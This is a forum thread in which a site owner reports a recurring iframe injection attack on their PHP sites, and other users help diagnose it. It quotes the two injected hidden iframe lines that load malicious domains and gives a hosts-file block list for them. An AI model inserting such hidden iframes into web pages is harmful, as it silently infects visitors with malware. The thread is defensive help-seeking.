cancel
Showing results for 
Search instead for 
Did you mean: 

My websites are under attack!

SoulBriski
Grafter
Posts: 179
Registered: ‎15-06-2007

My websites are under attack!

I have two websites I'm currently working on.
They are hosted on PAYH and one of them is a subdomain of the other.
I'm not using any third party script.
PAYH have had a look at the server log and confirmed that there is only my IP address that has accessed it.
I have changed my FTP password frequently
My site is very heavily PHP based but I use MS Frontpage to design the html elements and FTP the files to the server
The following line of code is being inserted into the first line of my index, login, news, home pages
<iframe src="http://keymydomains.com/" width="1" height="2"></iframe>

on another occasion last week, the line of code was
<iframe src="http://npanelsrv.info/" width="1" height="2"></iframe>

I have now learned to keep checking file manager in my Plesk CP to make sure this code has not been inserted. If it is there then a visit to my site will cause my PC to shut down and restart full of adware and viruses.
I have cleaned my pc with combofix, AVG Anti-RootKit, spybot S & D, windows defender, McAffee AV (all with latest updates) but this problem keeps coming back.
My conclusion is that my own pc is doing the damage during the FTP upload but I cannot find the source of the problem.
Can anyone help and advise me how to fix this problem?
6 REPLIES 6
Midnight_Caller
Rising Star
Posts: 4,154
Thanks: 9
Fixes: 1
Registered: ‎15-04-2007

Re: My websites are under attack!

Just done a google on keymydomains.com and got this:
[quote="Norton Safe Web"]
av.org
Summary
•Computer Threats:  2
•Identity Threats:  0
•Annoyance factors:   0 
   
Total threats on this site:  2
     
•Community Reviews:   0 

The Norton rating is a result of Symantec's automated analysis system.
[Snip]
Web Site Location  United States of America
[Snip]
Viruses
Threat Name:  Trojan.Pidief.C 
Threat Name:  Trojan.Malscript!html 

So you have been to a site with viruses on it!  Learn more from the link above.
Hope this helps.
P.S.
Add the  domains:
av.org
keymydomains.com
npanelsrv.info
To your hosts file like this:
127.0.0.1  av.org
127.0.0.1  keymydomains.com
127.0.0.1  npanelsrv.info
P.P.S.
Use Sandboxed to protekt your Browser
Ponds
Dabbler
Posts: 20
Registered: ‎19-10-2007

Re: My websites are under attack!


There's a discussion of what to do about iframe injection attacks  at http://www.webhostingtalk.com/showthread.php?t=887539
Good luck
bobpullen
Community Gaffer
Community Gaffer
Posts: 14,877
Thanks: 2,476
Fixes: 168
Registered: ‎04-04-2007

Re: My websites are under attack!

As Ponds has alluded to, it would seem that you're being subjected to an iFrame injection attack. Given what you've said about changing your passwords, the root cause is much more likely to be due to vulnerabilities in one or more of your PHP scripts.

Bob Pullen
Plusnet Product Team
If I've been helpful then please give thanks ⤵

SoulBriski
Grafter
Posts: 179
Registered: ‎15-06-2007

Re: My websites are under attack!

Thanks for your help you guys
The very first time there was an indication of a problem was when i went to one of my regular message boards. It's a 'freeforums' crown green bowling message board but because it's free it's full of ad-banners etc. Loads of porn popups suddenly appeared and my pc shutdown and restarted. My PC was then infected with Anti-Virus 2009 and a million other malware problems which I have since attempted to fix with the methods described in my original post.
Ever since then my own site has had these iframe injection attacks so I must agree with what Midnight Caller said about visiting a site with viruses. Staying with Midnight Caller, I don't know how to add those domains to my hosts file. I asked PAYH if I could exclude ISP's but they can't because it's a shared server. I will look into sandboxed.
I will also follow the advice from Ponds and Bob to look into those PHP script vulnerabilities. I'm learning PHP so there probably are weaknesses in my code Embarrassed
In the Logs area of my plesk control panel, i can see the log of my primary pages been edited in the early hours of the morning by an IP address which isn't mine.
I hope the new info I've given has helped describe the problem better and enable you to confirm your suspicions about the possible cause
Many thanks
Brian
Midnight_Caller
Rising Star
Posts: 4,154
Thanks: 9
Fixes: 1
Registered: ‎15-04-2007

Re: My websites are under attack!

SoulBriski, you can download a copy of my hosts files Here put the hosts file in a folder with the program mvps.bat and the program stop.and.disable.dnscache.bat to update your hosts file double click on mvps.bat then run stop.and.disable.dnscache.bat wich will stop your computer slowing down, with my hosts file been so big, you can edit the hosts file with Notepad, you can add and remove addresses from the hosts file.
Right click on them and save target as, to a folder on your computer.
I hope this helps.
P.S.
You may want to download a program that kils Flash cookies from Here, Right click on them and save target as, to a folder on your computer then double click on flashblock.bat and follow the instructions.
Pleas see [Security] - Hidden Flash cookies for more information.
mal0z
Community Veteran
Posts: 3,486
Registered: ‎02-10-2008

Re: My websites are under attack!

Firstly - i'm not an expert at php - but I have been warned off using some php scripts you find on the net - as some have security holes ??.
I struggled with php until I read David Powers books on the subject - and he explains some of these security issues and ways to avoid trouble.
http://foundationphp.com/books.php